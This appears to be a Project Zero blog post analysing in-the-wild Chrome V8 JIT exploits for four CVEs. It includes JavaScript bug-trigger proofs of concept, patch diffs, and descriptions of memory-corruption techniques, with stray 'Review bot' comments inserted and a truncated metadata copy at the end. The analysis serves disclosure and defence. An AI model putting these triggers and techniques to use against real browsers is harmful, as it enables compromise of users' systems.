This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).
Posted by Sergei Glazunov, Project Zero
### Introduction
As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.
![Timeline of the extracted exploits and the Chrome versions they affected](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png>)
All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still [exploited in real-world attacks](<https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>) against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.
The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.
### 1\. CVE-2017-5070
#### The vulnerability
This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:
```javascript
global_array = [, 1.1];

function trigger(local_array) {
  var temp = global_array[0];   // Crankshaft emits a map check on global_array here
  local_array[1] = {};          // may transition local_array from double to tagged elements
  return global_array[1];       // the "redundant" map check is (incorrectly) eliminated
}

trigger([, {}]);
trigger([, 1.1]);
for (var i = 0; i < 10000; i++) {
  trigger([, {}]);
}
print(trigger(global_array));   // print() is the d8 shell's output function
```
The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.
The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.
The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=722756>) by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8.git/+/e33fd30777f99a0d6e16b16d096a2663b1031457>) made the alias analyzer use the constant comparison only when both arguments are constants:
HAliasing Query(HValue* a, HValue* b) {
[...]
// Constant objects can be distinguished statically.
- if (a->IsConstant()) {
+ if (a->IsConstant() && b->IsConstant()) {
return a->Equals(b) ? kMustAlias : kNoAlias;
}
return kMayAlias;
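Review bot: the comment `// Constant objects can be distinguished statically.` above the changed condition now understates the rule. With the added `b->IsConstant()` guard, only two constants are compared statically, and a constant against a non-constant node falls through to `kMayAlias`; the old single-constant reasoning is exactly the assumption this fix removes, so the comment should say "two constant objects" to stop the next reader from reintroducing it.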
#### Exploit 1
The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.
The author of the exploit takes a [known approach](<http://phrack.org/papers/attacking_javascript_engines.html>) to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.
The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.
The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.
However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.
#### Exploit 2
The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.
The general approach is similar; however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind, as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and is only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.
While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public [proof-of-concept](<https://chromium.googlesource.com/v8/v8/+/e33fd30777f99a0d6e16b16d096a2663b1031457/test/mjsunit/regress/regress-crbug-722756.js>).
### 2\. CVE-2020-6418
#### The vulnerability
This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:
```javascript
'use strict';
(function() {
  var popped;

  function trigger(new_target) {
    function inner(new_target) {
      function constructor() {
        popped = Array.prototype.pop.call(array);
      }
      var temp = array[0];   // the map check on array is recorded here
      // Reflect.construct becomes a JSCreate node in the optimized graph
      return Reflect.construct(constructor, arguments, new_target);
    }
    inner(new_target);
  }

  var array = new Array(0, 0, 0, 0, 0);
  for (var i = 0; i < 20000; i++) {
    trigger(function() { });
    array.push(0);
  }

  // A proxy as new_target: the property access during construction
  // transitions array from tagged to double elements behind the compiler's back.
  var proxy = new Proxy(Object, {
    get: () => (array[4] = 1.1, Object.prototype)
  });
  trigger(proxy);
  print(popped);   // print() is the d8 shell's output function
}());
```
A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable, meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.
Note that the attacker can’t call pop on the array directly, because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.
This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1053604>) under the 7-day deadline. [The one-line patch](<https://chromium.googlesource.com/v8/v8.git/+/fb0a60e15695466621cf65932f9152935d859447>) modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:
InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
[...]
InferReceiverMapsResult result = kReliableReceiverMaps;
[...]
case IrOpcode::kJSCreate: {
if (IsSame(receiver, effect)) {
base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
if (initial_map.has_value()) {
*maps_return = ZoneHandleSet<Map>(initial_map->object());
return result;
}
// We reached the allocation of the {receiver}.
return kNoReceiverMaps;
}
+ result = kUnreliableReceiverMaps; // JSCreate can have side-effect.
break;
}
[...]
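Review bot: the added `result = kUnreliableReceiverMaps;` at the end of the `kJSCreate` case carries only the comment `// JSCreate can have side-effect.`, which does not tell a reader of this switch which side effect is meant or why it matters for maps inferred earlier in the effect chain. Suggest expanding it to say that constructing with a user-controlled `new_target` can run script (a proxy trap on the property access described above) that changes the receiver's map, so any maps walked past this node must be re-checked at runtime. The `return result;` in the `IsSame(receiver, effect)` branch still returns `kReliableReceiverMaps`, which the hunk leaves deliberately unchanged; a one-line comment there stating that the receiver's own allocation is the case that stays reliable would make the asymmetry intentional rather than look like an oversight.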
The reader can refer to [the blog post](<https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping-chrome/>) published by Exodus Intel for more details on the issue and their version of the exploit.
#### Exploit 1
This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.
The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.
The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive” garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private [symbols](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol>), owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.
The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.
Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.
The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.
The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:
```javascript
jit_detector[Symbol.toPrimitive] = function() {
  var stack = (new Error).stack;
  if (stack.indexOf("Number (") == -1) {
    jit_detector.is_compiled = true;
  }
};

function trigger(array, proxy) {
  if (!jit_detector.is_compiled) {
    Number(jit_detector);
  }
  [...]
```
During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.
The exploit was broken in Chrome 64 by [the change](<https://chromium.googlesource.com/v8/v8/+/52ab610bd13>) that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.
#### Exploit 2
After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, [another commit](<https://chromium.googlesource.com/v8/v8/+/ccbbdb93a1c6f38422097738a830c137576d92fd>) landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:
```javascript
function trigger(new_target) {
  function inner(new_target) {
    popped = array.pop(
        Reflect.construct(function() { }, arguments, new_target));
  }
  inner(new_target);
}
```
By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.
The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.
The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.
This version targets Chrome 68-72. It was broken by [the commit](<https://chromium.googlesource.com/v8/v8.git/+/f7aa8ea00bbf200e9050a22ec84fab4f323849a7%5E%21/>) that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.
#### Exploit 3 & 4
The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.
Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.
The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.
[The public exploit](<https://blog.exodusintel.com/wp-content/uploads/2020/05/exp.zip>) presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the [pointer compression](<https://v8.dev/blog/pointer-compression>) feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.
### 3\. CVE-2019-5782
#### The vulnerability
CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.
Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the [previous post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).
In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:
```javascript
oob_index = 100000;

function trigger() {
  let array = [1.1, 1.1];
  let index = arguments.length;   // the typer assigns this the range [0; 65534]
  index = index - 65534;
  index = Math.max(index, 0);     // the typer concludes index is always 0 and drops the bounds check
  return array[index] = 2.2;
}

for (let i = 0; i < 20000; i++) {
  trigger(1,2,3);
}
// apply is not subject to the 65534-argument limit the typer assumed
print(trigger.apply(null, new Array(65534 + oob_index)));   // print() is the d8 shell's output function
```
Qixun Zhao used the same vulnerability in Tianfu Cup and [reported it to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>) in November 2018. The public report includes a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8/+/8e4588915ba7a9d9d744075781cea114d49f0c7b>), which landed in Chrome 72, simply relaxed the range of the length property.
#### The exploit
The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.
Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.
As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that [one of the hardening patches](<https://chromium.googlesource.com/v8/v8.git/+/f53dfd934df0c95e1a82680ce87f48b5d60902d1%5E%21/>) against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with [site isolation](<https://www.chromium.org/Home/chromium-security/site-isolation>); hence, [the public exploit](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>), which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.
The public and private exploits have little in common apart from the bug itself and the BCE technique, which has been commonly known [since at least 2017](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>). The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.
### 4\. CVE-2019-13764
This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:
```javascript
for (var i = -Infinity; i < 0; i += Infinity) { [...] }
```
This vulnerability and exploit for Chrome 73-79 have been discussed in detail in [the previous blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>). There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.
The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.
It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.
### Conclusion
The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.
It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.
The area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.
This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 4: Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>).
{"id": "GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "vendorId": null, "type": "googleprojectzero", "bulletinFamily": "info", "title": "\nIn-the-Wild Series: Chrome Exploits\n", "description": "This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Sergei Glazunov, Project Zero\n\n### Introduction\n\nAs we continue the series on the watering hole attack discovered in early 2020, in this post we\u2019ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png>)\n\nAll vulnerabilities used by the attacker are in V8, Chrome\u2019s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still [exploited in real-world attacks](<https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>) against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. 
Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.\n\nThe bugs themselves aren\u2019t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker\u2019s exploit development process.\n\n### 1\\. CVE-2017-5070\n\n#### The vulnerability\n\nThis is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:\n\nglobal_array = [, 1.1];\n\nfunction trigger(local_array) {\n\nvar temp = global_array[0];\n\nlocal_array[1] = {};\n\nreturn global_array[1];\n\n}\n\ntrigger([, {}]);\n\ntrigger([, 1.1]);\n\nfor (var i = 0; i < 10000; i++) {\n\ntrigger([, {}]);\n\n}\n\nprint(trigger(global_array)); \n \n--- \n \nThe first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the \u201cshape\u201d of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. 
Since the compiler incorrectly assumes that local_array and global_array can\u2019t point to the same object, it doesn\u2019t invalidate the recorded map state of global_array and, consequently, eliminates the \u201credundant\u201d map check in the last line of the function.\n\nThe vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.\n\nThe issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=722756>) by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8.git/+/e33fd30777f99a0d6e16b16d096a2663b1031457>) made made the alias analyser use the constant comparison only when both arguments are constants:\n\nHAliasing Query(HValue* a, HValue* b) {\n\n[...]\n\n// Constant objects can be distinguished statically.\n\n- if (a->IsConstant()) {\n\n+ if (a->IsConstant() && b->IsConstant()) {\n\nreturn a->Equals(b) ? kMustAlias : kNoAlias;\n\n}\n\nreturn kMayAlias; \n \n--- \n \n#### Exploit 1\n\nThe earliest exploit we\u2019ve discovered targets Chrome 37-58. This is the widest version range we\u2019ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.\n\nThe author of the exploit takes a [known approach](<http://phrack.org/papers/attacking_javascript_engines.html>) to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It \u201cconstructs\u201d a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. 
Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can\u2019t be modified. Instead, it\u2019s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.\n\nThe exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.\n\nThe author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren\u2019t moved by the garbage collector. And, of course, the exploit runs inside a web worker.\n\nHowever, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it\u2019s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.\n\n#### Exploit 2\n\nThe second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit\u2019s supported version range, and the exploit server always gives preference to the second exploit. 
The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

The general approach is similar; however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind, as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and is only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is the use of a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression is translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue; for example, their trigger function is much more straightforward than in the public [proof-of-concept](<https://chromium.googlesource.com/v8/v8/+/e33fd30777f99a0d6e16b16d096a2663b1031457/test/mjsunit/regress/regress-crbug-722756.js>).

### 2. CVE-2020-6418

#### The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object.
Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

```javascript
'use strict';

(function() {
  var popped;

  function trigger(new_target) {
    function inner(new_target) {
      function constructor() {
        // Runs during Reflect.construct, i.e. after the JSCreate node; the
        // compiler still trusts the map checked by the array[0] load below.
        popped = Array.prototype.pop.call(array);
      }
      var temp = array[0];  // inserts the map check the compiler later relies on
      return Reflect.construct(constructor, arguments, new_target);
    }
    inner(new_target);
  }

  var array = new Array(0, 0, 0, 0, 0);

  // Warm up with a harmless new_target so that trigger gets JIT-compiled.
  for (var i = 0; i < 20000; i++) {
    trigger(function() { });
    array.push(0);
  }

  // A proxy as new_target: its get trap runs while JSCreate reads the
  // prototype and transitions the array to double elements.
  var proxy = new Proxy(Object, {
    get: () => (array[4] = 1.1, Object.prototype)
  });

  trigger(proxy);
  print(popped);  // d8 builtin; use console.log outside d8
}());
```

A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable, meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.

Note that the attacker can’t call the array function directly, because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1053604>) under the 7-day deadline.
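To make the inference failure concrete, here is an added toy model of the backward walk over the effect chain that InferReceiverMapsUnsafe performs. It is illustrative code written for this post, not V8's implementation: the node shapes, the map names PACKED_SMI and PACKED_DOUBLE, the stand-in proxy trap and the `fixed` flag (which applies the same downgrade to kUnreliableReceiverMaps as the patch discussed next) are all constructed for the model.

```javascript
// Toy model of receiver-map inference for the CVE-2020-6418 pattern.
// Constructed for illustration; not V8 code.
const kReliableReceiverMaps = 'reliable';
const kUnreliableReceiverMaps = 'unreliable';
const kNoReceiverMaps = 'none';

// Walk the effect chain backwards from node `index` looking for a map check on
// `receiver`. With fixed === false a JSCreate node is skipped silently (the bug);
// with fixed === true it downgrades the result, as the one-line patch does.
function inferReceiverMaps(chain, index, receiver, fixed) {
  let result = kReliableReceiverMaps;
  for (let i = index - 1; i >= 0; i--) {
    const node = chain[i];
    if (node.op === 'CheckMaps' && node.receiver === receiver) {
      return { result, maps: node.maps };
    }
    if (node.op === 'JSCreate' && fixed) {
      result = kUnreliableReceiverMaps; // JSCreate can run user JS via new_target
    }
  }
  return { result: kNoReceiverMaps, maps: [] };
}

// The call reducer for Array.prototype.pop: the runtime map check is dropped
// only when the inference result is reliable.
function compile(chain, fixed) {
  return chain.map((node, i) => {
    if (node.op !== 'ArrayPop') return { ...node };
    const inf = inferReceiverMaps(chain, i, node.receiver, fixed);
    return { ...node, maps: inf.maps, needsCheck: inf.result !== kReliableReceiverMaps };
  });
}

// Execute the compiled chain against a concrete heap state. A proxy passed as
// new_target transitions the array (PACKED_SMI -> PACKED_DOUBLE) in its get trap.
function run(compiled, heap) {
  const maps = { ...heap };
  for (const node of compiled) {
    if (node.op === 'CheckMaps') {
      if (!node.maps.includes(maps[node.receiver])) return 'deopt';
    } else if (node.op === 'JSCreate') {
      if (node.newTarget === 'proxy') maps.array = 'PACKED_DOUBLE';
    } else if (node.op === 'ArrayPop') {
      if (node.maps.includes(maps[node.receiver])) return 'ok';
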